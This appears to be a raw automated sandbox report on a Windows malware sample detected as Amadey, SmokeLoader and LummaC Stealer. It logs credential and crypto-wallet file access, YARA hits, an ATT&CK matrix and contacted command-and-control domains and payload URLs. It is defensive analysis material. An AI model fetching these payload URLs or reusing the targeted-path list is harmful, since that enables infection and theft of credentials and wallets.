Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA

Source: Yara match	File source: 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2985106102.0000000000830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2982362975.000000000082E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 320, type: MEMORYSTR

Remote Access Functionality

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 10.0.7C81.exe.7ff7d4c00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.7C81.exe.7ff7d4c00000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2860245379.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2960028925.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7C81.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7C81.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 320, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	331 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	11 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	234 System Information Discovery	Remote Desktop Protocol	41 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	812 Process Injection	4 Obfuscated Files or Information	Security Account Manager	1051 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	11 Registry Run Keys / Startup Folder	12 Software Packing	NTDS	481 Virtualization/Sandbox Evasion	Distributed Component Object Model	2 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	3 Process Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	481 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	812 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	50%	ReversingLabs	Win32.Trojan.Amadey
file.exe	43%	Virustotal		Browse
file.exe	100%	Avira	HEUR/AGEN.1312596
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\sashibt	100%	Avira	HEUR/AGEN.1312596
C:\Users\user\AppData\Local\Temp\3530.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\sashibt	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3530.exe	71%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\6E8A.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7C81.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\sashibt	50%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
funrecipebooks.com	1%	Virustotal	Browse
store4.gofile.io	0%	Virustotal	Browse
rentry.co	1%	Virustotal	Browse
mzxn.ru	0%	Virustotal	Browse
liernessfornicsa.shop	19%	Virustotal	Browse
mussangroup.com	14%	Virustotal	Browse
callosallsaospz.shop	19%	Virustotal	Browse
206.23.85.13.in-addr.arpa	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://ocsps.ssl.com0?	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q	0%	URL Reputation	safe
http://ocsps.ssl.com0	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://www.ssl.com/repository0	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
https://callosallsaospz.shop/api	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://word.office.comon	0%	Avira URL Cloud	safe
http://100xmargin.com/tmp/index.php	0%	Avira URL Cloud	safe
http://html4/loose.dtd	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://100xmargin.com/tmp/index.php	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://olinsw.ws/tmp/index.php	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/apicnmamaa	100%	Avira URL Cloud	malware
http://wgdnb4rc.xyz/tmp/index.php	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://107.173.160.137/	0%	Virustotal		Browse
http://olinsw.ws/tmp/index.php	0%	Virustotal		Browse
https://callosallsaospz.shop/api	22%	Virustotal		Browse
https://107.173.160.137/	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://wgdnb4rc.xyz/tmp/index.php	0%	Virustotal		Browse
https://rentry.co/microgods/raw	0%	Avira URL Cloud	safe
http://mzxn.ru/tmp/index.php	0%	Avira URL Cloud	safe
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	0%	Avira URL Cloud	safe
http://store4.gofile.io	0%	Avira URL Cloud	safe
lariatedzugspd.shop	100%	Avira URL Cloud	malware
http://.css	0%	Avira URL Cloud	safe
http://store4.gofile.io	0%	Virustotal		Browse
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	0%	Avira URL Cloud	safe
http://mzxn.ru/tmp/index.php	2%	Virustotal		Browse
lariatedzugspd.shop	19%	Virustotal		Browse
callosallsaospz.shop	100%	Avira URL Cloud	malware
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	0%	Avira URL Cloud	safe
https://rentry.co/microgods/raw	1%	Virustotal		Browse
https://callosallsaospz.shop/bO	100%	Avira URL Cloud	malware
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	0%	Virustotal		Browse
https://callosallsaospz.shop/e	100%	Avira URL Cloud	malware
http://ocsps.ssl.com0_	0%	Avira URL Cloud	safe
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	0%	Virustotal		Browse
https://callosallsaospz.shop/b	100%	Avira URL Cloud	malware
callosallsaospz.shop	19%	Virustotal		Browse
https://167.235.128.153/	0%	Avira URL Cloud	safe
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	0%	Virustotal		Browse
https://callosallsaospz.shop/apioro	100%	Avira URL Cloud	malware
https://callosallsaospz.shop/m	100%	Avira URL Cloud	malware
https://callosallsaospz.shop/h	100%	Avira URL Cloud	malware
https://167.235.128.153/	0%	Virustotal		Browse
https://callosallsaospz.shop/i	100%	Avira URL Cloud	malware
https://funrecipebooks.com/setups.exe	100%	Avira URL Cloud	malware
liernessfornicsa.shop	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
liernessfornicsa.shop	19%	Virustotal		Browse
https://rentry.co	0%	Avira URL Cloud	safe
http://www.oberhumer.com	0%	Avira URL Cloud	safe
https://wns.windows.com/)s	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/o	100%	Avira URL Cloud	malware
https://funrecipebooks.com/setups.exe	1%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/D	100%	Avira URL Cloud	malware
https://callosallsaospz.shop/i	17%	Virustotal		Browse
https://store4.gofile.io	0%	Avira URL Cloud	safe
https://107.173.160.139/	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/apiQbd	100%	Avira URL Cloud	malware
https://callosallsaospz.shop/apisF	100%	Avira URL Cloud	malware
https://callosallsaospz.shop/apiem	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
funrecipebooks.com	162.0.235.84	true	true	1%, Virustotal, Browse	unknown
store4.gofile.io	31.14.70.245	true	false	0%, Virustotal, Browse	unknown
rentry.co	104.26.3.16	true	true	1%, Virustotal, Browse	unknown
mzxn.ru	186.145.236.93	true	true	0%, Virustotal, Browse	unknown
liernessfornicsa.shop	172.67.213.85	true	true	19%, Virustotal, Browse	unknown
mussangroup.com	185.149.100.242	true	true	14%, Virustotal, Browse	unknown
callosallsaospz.shop	188.114.96.3	true	true	19%, Virustotal, Browse	unknown
206.23.85.13.in-addr.arpa	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://callosallsaospz.shop/api	false	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://100xmargin.com/tmp/index.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://olinsw.ws/tmp/index.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://wgdnb4rc.xyz/tmp/index.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://107.173.160.137/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://rentry.co/microgods/raw	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mzxn.ru/tmp/index.php	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
lariatedzugspd.shop	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
callosallsaospz.shop	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://167.235.128.153/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://funrecipebooks.com/setups.exe	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
liernessfornicsa.shop	true	19%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://107.173.160.139/	true	Avira URL Cloud: safe	unknown
shepherdlyopzc.shop	true	Avira URL Cloud: safe	unknown
upknittsoappz.shop	true	Avira URL Cloud: safe	unknown
https://mussangroup.com/wp-content/images/pic1.jpg	true	Avira URL Cloud: malware	unknown
outpointsozp.shop	true	Avira URL Cloud: safe	unknown
https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip	false	Avira URL Cloud: safe	unknown
unseaffarignsk.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000002.00000000.2081714361.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://html4/loose.dtd	7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 0000000E.00000003.2984214183.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 0000000E.00000003.2984214183.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://callosallsaospz.shop/apicnmamaa	BitLockerToGo.exe, 0000000E.00000003.3104687148.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://powerpoint.office.comcember	explorer.exe, 00000002.00000000.2083945040.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0?	6E8A.exe.2.dr	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	6E8A.exe.2.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q	6E8A.exe.2.dr	false	URL Reputation: safe	unknown
http://ocsps.ssl.com0	6E8A.exe.2.dr	false	URL Reputation: safe	unknown
http://store4.gofile.io	powershell.exe, 0000000F.00000002.4477339135.0000022A36808000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A3693F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	6E8A.exe.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://.css	7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000002.00000000.2080799819.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2081253102.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2081273713.0000000008890000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	6E8A.exe.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://callosallsaospz.shop/bO	BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044923800.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042953419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3043989545.000000000083E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/e	BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044923800.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042953419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3043989545.000000000083E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/	powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
